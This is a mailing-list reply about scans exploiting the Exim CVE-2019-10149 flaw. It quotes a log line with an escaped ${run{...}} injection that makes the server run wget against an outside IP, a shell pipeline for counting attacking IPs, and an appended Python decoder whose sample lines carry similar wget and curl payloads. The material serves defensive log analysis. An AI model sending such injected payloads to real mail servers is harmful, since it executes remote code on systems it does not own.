Re: [bitfolk] Scans attempting to exploit CVE-2019-10149 hav…

Author: Keith Williams
Date:  
To: BitFolk Users
Subject: Re: [bitfolk] Scans attempting to exploit CVE-2019-10149 have been in the wild for some days
I have just read up on this, after seeing this email. It appears that over
90% of exim4 servers are running vulnerable unpatched versions of the
software. It also seems that the malware involved sets up a cron job
under user root to go on downloading other nasty stuff.
It seems that the best preventative step is to ensure that your exim is up
to date running version >= 4.92. The only cure that I can see in the sites
I have looked at is a complete nuking and format. This is a nasty brute

On Sun, 23 Jun 2019 at 04:25, Andy Smith <andy@???> wrote:

> Hello,
>
> I've just ran a grep on all of my mail logs for the string "run{" to
> see who's been trying to exploit CVE-2019-10149. A successful match
> looks like this on my MTA (Exim):
>
> 2019-06-19 14:57:19 H=li810-176.members.linode.com (service.com) [104.237.134.176] F=<support@???> rejected RCPT <root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x2064.50.180.45\x2ftmp\x2f85.119.82.70\x22}}@???>: Unrouteable address
>
> This appears to be attempting to execute:
>
>     sh -c "wget 64.50.180.45/tmp/85.119.82.70"
>
> on my host. I assume that the attacker watches their HTTP logs for
> requests for /tmp/85.119.82.70 and then they know they've found an
> exploitable host.
>
> Here's a list of offenders sorted by attempt count:
>
> Most worrying, a BitFolk IP was amongst my findings. i.e. there is a
> BitFolk customer VPS also doing this. Most likely they have already
> been compromised by this technique. I've removed them from the
> results above but I expect if you search your own logs you'll find
> them. They have already been notified.
>
> I created the above output with this script:
>
> https://gist.github.com/grifferz/f92a9c885443a0db8776c4f2f10f914f
>
> To use it in this case would be something like:
>
> $ zcat -f /var/log/exim4/mainlog* \
>     | grep "run{" \
>     | awk -F'[' '{ gsub(/\].*/, "", $2); print $2 }' \
>     | sort | uniq -c | sort -rn | ~/attackers.sh
>
> The awk is separating an IP address out of the [1.2.3.4]. The
> sort/uniq/sort is generating an event count. attackers.sh is merely
> getting extra info about the IP address.
>
> Cheers,
> Andy
>
> --
> https://bitfolk.com/ -- No-nonsense VPS hosting
> _______________________________________________
> users mailing list
> users@???
> https://lists.bitfolk.com/mailman/listinfo/users
>
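As an added example that is not from either poster nor from Andy's gist, here is a Python version of the same triage: it pulls the sending IP out of the `[1.2.3.4]` field, decodes the `\xNN` and `\t` escapes in the `${run{...}}` expansion so the attempted command is readable, and counts attempts per source. The log lines are constructed (RFC 5737 documentation addresses) in the mainlog format quoted in the thread.

```python
import re
from collections import Counter

# Constructed sample Exim mainlog lines (not from the list post); addresses are
# RFC 5737 documentation ranges and the escaped ${run{...}} form mirrors the
# rejected RCPT line quoted in the thread.
SAMPLE_LOG = r"""2019-06-19 14:57:19 H=mail.example.invalid (service.com) [192.0.2.10] F=<support@example.invalid> rejected RCPT <root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x20198.51.100.5\x2ftmp\x2f203.0.113.7\x22}}@example.invalid>: Unrouteable address
2019-06-19 15:01:02 H=(localhost) [192.0.2.10] F=<a@example.invalid> rejected RCPT <root+${run{\x2Fbin\x2Fsh\t-c\t\x22curl\x20198.51.100.5\x22}}@example.invalid>: Unrouteable address
2019-06-19 15:03:44 H=(localhost) [192.0.2.11] F=<b@example.invalid> rejected RCPT <root+${run{\x2Fbin\x2Fsh\t-c\t\x22id\x22}}@example.invalid>: Unrouteable address
2019-06-19 15:05:00 H=mx.example.invalid [192.0.2.12] F=<c@example.invalid> rejected RCPT <nobody@example.invalid>: Unrouteable address
"""

# Sending host IP in [...] followed later on the line by a ${run{...}} expansion.
LINE_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\].*?\$\{run\{(.*?)\}\}")
# Exim string escapes seen in the scans: \xNN hex bytes plus \t \n \r \\.
ESCAPE_RE = re.compile(r"\\x([0-9A-Fa-f]{2})|\\([tnr\\])")
SIMPLE_ESCAPES = {"t": "\t", "n": "\n", "r": "\r", "\\": "\\"}


def decode_exim_escapes(s):
    """Turn the escaped payload into the command Exim would have been asked to run."""
    def repl(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 16))
        return SIMPLE_ESCAPES[m.group(2)]
    return ESCAPE_RE.sub(repl, s)


def find_run_attempts(log_text):
    """Return (source_ip, decoded_command) for every line carrying a ${run{ attempt."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if m:
            hits.append((m.group(1), decode_exim_escapes(m.group(2))))
    return hits


def count_by_ip(hits):
    """Attempt count per source IP, most active first (like sort | uniq -c | sort -rn)."""
    return Counter(ip for ip, _ in hits).most_common()


if __name__ == "__main__":
    attempts = find_run_attempts(SAMPLE_LOG)
    for ip, cmd in attempts:
        print(f"{ip}\t{cmd!r}")
    for ip, n in count_by_ip(attempts):
        print(f"{n:5d}  {ip}")
```

On a real host, feed it `zcat -f /var/log/exim4/mainlog*` output instead of `SAMPLE_LOG`; the decoded command tells you what the scanner wanted fetched, which is what to look for if you suspect a box already ran it.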